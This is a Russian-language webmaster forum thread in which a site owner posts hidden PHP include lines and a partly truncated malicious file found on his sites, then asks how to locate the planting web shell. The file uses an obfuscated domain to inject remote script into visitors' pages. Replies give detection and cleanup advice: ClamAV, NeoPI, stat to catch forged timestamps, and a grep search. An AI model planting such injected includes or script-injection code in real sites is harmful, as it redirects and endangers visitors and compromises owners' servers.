Реклама на сайте Advertise with us

Как найти вебшелл ?

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:

местный

С нами с 10.08.03
Сообщения: 1578
Рейтинг: 2362


Передовик Master-X (16.09.2011) Передовик Master-X (01.10.2011)
Ссылка на сообщениеДобавлено: 10/11/13 в 11:47       Ответить с цитатойцитата 

обнаружил на некоторых своих сайтах странный инклуд и резкое падение трафа

$qi='/tmp/.ICE-unix/w';@include_once($qi);
и
$qi='/tmp/.ICE-unix/w';@include($qi);

в самом файле вот такой код
Код:
<?php
$qout=($qout)?$qout:'(/out.php|/st/st.php|/scj/cgi/out.php|/dtr/link.php)';
if(!$_COOKIE['qc'] && ((!$_SERVER['HTTP_X_REAL_IP'] && preg_match("%keep-alive%i", $_SERVER['HTTP_CONNECTION'])) || $_SERVER['HTTP_X_REAL_IP']) && $_SERVER['HTTP_USER_AGENT'] && !preg_match("%bot%i",$_SERVER['HTTP_USER_AGENT']) && preg_match("%(msie|chrome|firefox)%i",$_SERVER['HTTP_USER_AGENT']) && $_SERVER['HTTP
error_reporting(0);$qd=chr(120).chr(116).chr(119).chr(120).chr(116).chr(46).chr(99).chr(111).chr(109);
if($qi && $_SERVER['HTTP_REFERER'] && !preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER'])){echo "<script src='http://{$qd}/'></script>";}
elseif (is_array($_COOKIE) && $_SERVER['HTTP_REFERER'] && preg_match("%{$_SERVER['HTTP_HOST']}%i", $_SERVER['HTTP_REFERER']) && preg_match("%$qout%i", $_SERVER['SCRIPT_NAME'])){header("Set-Cookie: qc=1; path=/; expires=". gmdate('D, d-M-Y H:i:s', time()+604800) ." GMT;");echo "<html><body><script>var wo=window.ope
}
?>


подскажите как найти сам шелл через который заливают эту дрянь ?

самое интересное что дата последнего изминения php файла куда вставляется инклуд - не меняется

Покупаю сайты с доходом - ДОРОГО!

1
 

📈sflash.biz

С нами с 03.11.12
Сообщения: 3912
Рейтинг: 4447


Передовик Master-X (16.04.2018) Передовик Master-X (16.07.2018) Передовик Master-X (16.12.2022) Передовик Master-X (01.01.2023)
Ссылка на сообщениеДобавлено: 10/11/13 в 11:49       Ответить с цитатойцитата 

А я писал недвано об этом. Smart Thumbs - снова старая песня. Проверяем.
Почти никто не обратил внимание. Но своих трейдеров я предупредил в месенджерах.

9
 

местный

С нами с 10.08.03
Сообщения: 1578
Рейтинг: 2362


Передовик Master-X (16.09.2011) Передовик Master-X (01.10.2011)
Ссылка на сообщениеДобавлено: 10/11/13 в 12:12       Ответить с цитатойцитата 

S_Flash: спасибо за линк. Смарт тумбса и смарт сж не было, но я уже походу догадался как и что, я перенес домен один пару дней назад с сервера где был смарт тумбс и смартсж, и вот перенес уже с вебшелом (нашел кстати его)

Покупаю сайты с доходом - ДОРОГО!

0
 

мы, цари - народ работящий!

С нами с 11.06.05
Сообщения: 13121
Рейтинг: 4892


Передовик Master-X (01.09.2018)
Ссылка на сообщениеДобавлено: 10/11/13 в 13:20       Ответить с цитатойцитата 

расскажи как нашел?

I work with reallifecam sex in Voyeur-House.TV

5
 



С нами с 18.12.05
Сообщения: 111
Рейтинг: 160

Ссылка на сообщениеДобавлено: 10/11/13 в 13:51       Ответить с цитатойцитата 

clamav ищет нормально и NeoPI

8
 



С нами с 17.03.12
Сообщения: 335
Рейтинг: 790

Ссылка на сообщениеДобавлено: 10/11/13 в 13:56       Ответить с цитатойцитата 

xDiver писал:

самое интересное что дата последнего изминения php файла куда вставляется инклуд - не меняется

Время изменения файла можно подделать с помощью команды touch. На фре stat -x filename нужно смотреть поле Change, его подделать нельзя, на линуксятине просто stat filename.

9
 

мы, цари - народ работящий!

С нами с 11.06.05
Сообщения: 13121
Рейтинг: 4892


Передовик Master-X (01.09.2018)
Ссылка на сообщениеДобавлено: 10/11/13 в 15:18       Ответить с цитатойцитата 

Pika писал:
clamav ищет нормально и NeoPI


можно попроще?
я только ubuntu трогаю еще

Последний раз редактировалось: raider (10/11/13 в 15:33), всего редактировалось 1 раз

I work with reallifecam sex in Voyeur-House.TV

6
 



С нами с 24.06.10
Сообщения: 550
Рейтинг: 608

Ссылка на сообщениеДобавлено: 10/11/13 в 15:20       Ответить с цитатойцитата 

man clamcheck icon_wink.gif

Отличный хостинг и отзывчивый саппорт!

8
 

местный

С нами с 10.08.03
Сообщения: 1578
Рейтинг: 2362


Передовик Master-X (16.09.2011) Передовик Master-X (01.10.2011)
Ссылка на сообщениеДобавлено: 10/11/13 в 21:53       Ответить с цитатойцитата 

нашел банально !! начал смотреть подозрительные файлы на фтп, но сам понимал что маловероятно что сходу что-то замечу. Но мне повезло, нашел в папке /images пхп файл, а я никогда и нигде в имеджи исполняющии файлы не клал - это и привлекло сразу мое внимание. Потом просто вязл кусок закодированного в base64 кода и командой
Код:
find /home/sites/ -name \*.php -type f -exec grep -l "кусок кода" {} \;
прошелся в хоум дире и нашел копии вебшела

потом еще так же прошелся на предмет инклуда вебшела, у меня вот такие варианты были:
Код:

$qi='/tmp/.ICE-unix/t';@include($qi);
@$f='/tmp/cache';if(is_file($f))require($f);
$qi='/tmp/.ICE-unix/t';@include_once($qi);


на некоторых сайтах очень давно стоял код как мне кажется .. icon_sad.gif

Покупаю сайты с доходом - ДОРОГО!

4
 

📈sflash.biz

С нами с 03.11.12
Сообщения: 3912
Рейтинг: 4447


Передовик Master-X (16.04.2018) Передовик Master-X (16.07.2018) Передовик Master-X (16.12.2022) Передовик Master-X (01.01.2023)
Ссылка на сообщениеДобавлено: 10/11/13 в 23:35       Ответить с цитатойцитата 

Я зашёл на свои сайты, которым уже по 10 лет или больше на SmartThumbs, где нет даже банерной рекламы ифреймовой и тут каспер говорит, что есть попытка открыть вредоносный урл. Дебаггер и хедеры сразу подлсказали, где копать. Воторой заход с этого же браузере\IP уже не палилися.
Админы просканили сервер и /st/admin/variables.php как всегда отличился. Но судя по содержимому гадости, там заготовка не только для ST: Smart Thumbs - снова старая песня. Проверяем.

11
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »